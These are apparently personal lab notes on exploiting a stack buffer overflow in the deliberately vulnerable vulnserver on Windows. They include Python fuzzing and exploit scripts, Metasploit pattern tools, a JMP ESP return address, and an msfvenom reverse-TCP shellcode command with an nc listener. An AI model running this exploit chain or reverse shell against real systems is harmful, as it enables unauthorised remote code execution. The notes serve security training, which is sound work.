Buffer Overflows
Windows - OS (7-10)
vulnserver
Immunity Debugger
Anatomy of memory:
- Kernel
- Stack
- Heap
- Data
- Text
Overflowing the Buffer Space in stack and reach other levels allowing to control them
- 1.Spiking
- 2.Fuzzing
- 3.Finding the offset (find the break point)
- 4.Overwriting the EIP
- 5.Finding bad characters
- 6.Finding the Right Module
- 7.Generating the shellcode
- 8.Root <->
Open vulnserver using the debugger to see what breaks and so on
- From kali
Connect to {ip 9999} using nc Next up we put a bunch of characters to see if we can crash an app using a certain command.
generic_send_tcp ^ send a TCP request with our characters and test it Now we create a file {something}.spk and put this in there:s_readline();
s_string("STATS ");
s_string_variable("0");
STATS <- in this case, should be replaced with the command name to make it specific
Command to send the spike:
generic_send_tcp {ip} {port} file.spk 0 0 TRUN command appears to be vulnerableTRUN is vulnerable so we can now attack it Python fuzzing script
#!/usr/bin/python
import sys, socket
from time import sleep
buffer = "A" * 100
while True:
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('{IP}',{PORT}))
s.send(('TRUN /.:/' + buffer))
s.close()
sleep(1)
buffer = buffer + "A"*100
except:
print "Fuzzing crashed at %s bytes" % str(len(buffer))
sys.exit
Here we want to find the place which we override with the characters tool:
/usr/share/metasploit-framework/exploit/pattern_create.rb Command used:/usr/share/metasploit-framework/exploit/pattern_create.rb -l 3000
# -l = length
# 3000 = in the last step we found that it took around 27k-30k characters to break the app
Copy the output -> modify the script by replacing
offset with the characters and remove the while loop (offset is buffer in the old script) Script should look like this:#!/usr/bin/python
import sys,socket
offset = "{output from pattern_create}"
try:
s-socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('{IP}',{PORT}))
s.send(('TRUN /.:/' + offset))
s.close()
except:
print "Error connecting to the server"
sys.exit()
In the debugger, we could see that 386F4337 appears to be vulnerable Now, let's try something more specific
/usr/share/metasploit-framework/exploit/pattern_offset.rb -l 3000 -q 386F4337
# -l = length
# 3000 = in the last step we found that it took around 27k-30k characters to break the app
# -q emphasizes the target
Output: 2003 <- We can start controlling the EIP with this amount. (Exactly what we wanted)
Editing the script
#!/usr/bin/python
import sys,socket
shellcode = "A" * 2003 + "B" * 4
# 2003 A - when we start overwriting the EIP
try:
s-socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('{IP}',{PORT}))
s.send(('TRUN /.:/' + shellcode))
s.close()
except:
print "Error connecting to the server"
sys.exit()
- google "badchars" -> Bulbsecurity.com
- Copy-paste the badchars variable
- Add badchars to the script as a separate varible
- Add
+ badcharstoshellcode
Look at the debugger hex dump output If something is off - it's a bad character; Lack of bad characters is what we need
Tool: github.com/corelan/mona Save that script to the machine at
C:\ProgramFiles(x86)\ImmunityInc\ImmunityDebugger\PyCommands Type !mona modules in the ImmunityDebuggerIn kali:
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb We want to convert Assembly code to Hex Type command JMP ESP -> take FFE4Go back to immunity debugger and change
!mona modules to !mona find -s "\xff\xe4" -m essfunc.dllModify the python script and remove
badchars -> Change "B" *4 to "\xaf\x11\x50\x62"Tool: msfvenom Command:
msfvenom -p windows/shell_reverse_tcp LHOST={OUR IP} LPORT={OUR PORT} EXITFUNC=thread -f c -a x86 -b "\x00"Notes on the command:
# set the module = windows reverse tcp
# LHOST & LPORT = kali ip and port
# Exitfunc = for stability
# -b = bad characters (needs to be set or changed accordingly)
Copy and paste the output to our python code
- Make it a separate varible and add to the shellcode
+ overflow - To be 100% sure, it's good to add
+ "\x90" * 32before the `+overflow+
-> Set up nc listener -> Run the script